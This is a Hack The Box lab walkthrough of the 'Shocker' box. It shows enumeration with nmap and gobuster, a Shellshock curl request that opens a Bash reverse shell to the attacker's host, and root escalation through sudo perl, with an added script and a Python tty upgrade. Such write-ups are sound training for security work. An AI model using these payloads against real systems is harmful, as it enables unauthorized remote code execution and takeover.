Hack The Box - Shocker Walkthrough without Metasploit

Shocker is a Linux box rated easy. With some basic enumeration and a well-known Bash vulnerability (Shellshock) we get a shell on the box, and from there we escalate to root by abusing a binary the user is allowed to run with sudo.

[Image: Shocker]

Enumeration

First we run nmap (in our case through nmapAutomator.sh, a script that wraps nmap for basic enumeration of a target). Two ports are open: 80 (HTTP) and 2222 (SSH, on a non-standard port).

nmapAutomator.sh 10.10.10.56 All

or

nmap -sC -sV 10.10.10.56

[Screenshot: nmap scan output]

Since port 80 (HTTP) is open we run Gobuster against the web server.

We use gobuster in dir mode with the options -u (URL), -w (wordlist) and -t (threads). Because this is a lab box and not a production target we can afford 40 threads; against a real system that many concurrent requests can cause noise or denial of service.

gobuster dir -u 10.10.10.56 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40

[Screenshot: gobuster first run]

That first run did not turn up anything interesting, so we try another wordlist, this time big.txt from /usr/share/dirb/wordlists on our Kali machine. This one finds index.html and /cgi-bin/.

[Screenshot: gobuster finds /cgi-bin/]

Since we found a cgi-bin folder we run Gobuster again, this time against that directory and with two extra flags:

-x to specify the file extensions to look for

-e to print the full URL of each result

gobuster dir -u http://10.10.10.56:80/cgi-bin/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 20 -x php,db,txt,html,sh -e

[Screenshot: gobuster finds a .sh script in /cgi-bin/]

This output is really interesting: there is a shell script, user.sh, inside cgi-bin. A CGI script that Apache executes with Bash is exactly what a Shellshock attack needs, so that is what we try next.

Exploitation

We are going to exploit Shellshock, CVE-2014-6271, a vulnerability in Bash that gives unauthenticated Remote Code Execution (RCE) whenever attacker-controlled data ends up in the environment of a Bash process. The bug is in Bash itself, so any system with a vulnerable Bash reachable through CGI is exposed; in practice that mostly means Linux/Unix web servers such as Apache boxes, exactly like our victim.

The trigger is a value that starts with () { :; };. Vulnerable versions of Bash import any exported environment variable whose value begins with () { as a function definition, and because of a parsing bug they keep going after the function body and execute whatever follows the closing brace. Apache's CGI handler copies request headers into environment variables (the User-Agent header becomes HTTP_USER_AGENT), and user.sh is interpreted by Bash, so any command we append after the empty function body runs on the server with the web server's privileges.

We use that to launch a Bash reverse shell. With a listener waiting on our side (for example nc -lvnp on the chosen port), we send the request with curl:

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/<our-ip>/port 0>&1'" http://10.10.10.56/cgi-bin/user.sh

The echo; prints an empty line that terminates the CGI header section, so Apache does not reject the response as a malformed header before our command runs. The reverse shell then connects back to our listener.

[Screenshot: Shellshock CVE-2014-6271 request]

[Screenshot: Shellshock reverse shell]

Privilege Escalation

Once inside we enumerate again, this time from within the box. Our very first command, sudo -l, which lists the commands the current user may run through sudo, already gives a great result:

[Screenshot: sudo -l output]

With this information we go to GTFOBins (https://gtfobins.github.io/), the catalogue of Unix binaries that can be abused to escalate privileges, and search for perl:

[Screenshot: GTFOBins perl search]

Since we can run /usr/bin/perl as root with sudo, we follow the sudo entry on that page to spawn a root shell:

[Screenshot: perl privilege escalation]
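The screenshot above is the only record of the exact command used on the box. As an added example (not the walkthrough's own code), the snippet below parses sudo -l output for NOPASSWD entries and returns the GTFOBins sudo technique for perl, so the same check can be scripted on the next box; the sudo -l text is a constructed sample, and the user name in it is made up.

```shell
#!/usr/bin/env bash
# Added example, not from the original walkthrough: extract NOPASSWD sudo
# entries and show the GTFOBins sudo technique for perl.

# Constructed sample of `sudo -l` output in the format sudo prints (the
# box's real output only survives as a screenshot; the user name is made up).
SAMPLE_SUDO_L='Matching Defaults entries for someuser on Shocker:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User someuser may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl'

# Read `sudo -l` output on stdin and print each binary that can be run with
# sudo without a password, one per line. Also splits "(root) NOPASSWD: /a, /b".
nopasswd_binaries() {
    grep 'NOPASSWD:' | sed 's/.*NOPASSWD:[[:space:]]*//' | tr ',' '\n' \
        | sed 's/^[[:space:]]*//; s/[[:space:]]*$//' | grep -v '^$'
}

# GTFOBins "sudo" entry for perl: exec a shell from a one-liner. Because
# sudo runs perl as root, the shell it execs is root as well. Returned as a
# string so it can be reviewed before being pasted into the target shell.
perl_sudo_shell_cmd() {
    printf '%s' "sudo /usr/bin/perl -e 'exec \"/bin/sh\";'"
}

# Usage on the box (not executed here):
#   sudo -l | nopasswd_binaries      # expect /usr/bin/perl on this box
#   sudo /usr/bin/perl -e 'exec "/bin/sh";'
#   id                               # expect uid=0(root)
```

Any other binary the parser reports can be looked up on GTFOBins the same way; perl is listed because exec replaces the perl process with a shell while keeping the root privileges sudo granted.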

[Screenshot: pwned]

Since the box has Python3 we can upgrade the limited reverse shell to a proper tty with it (worth doing as soon as the shell lands, since sudo and other interactive programs behave better on a tty):

python3 -c 'import pty;pty.spawn("/bin/bash")'

[Screenshot: tty shell]
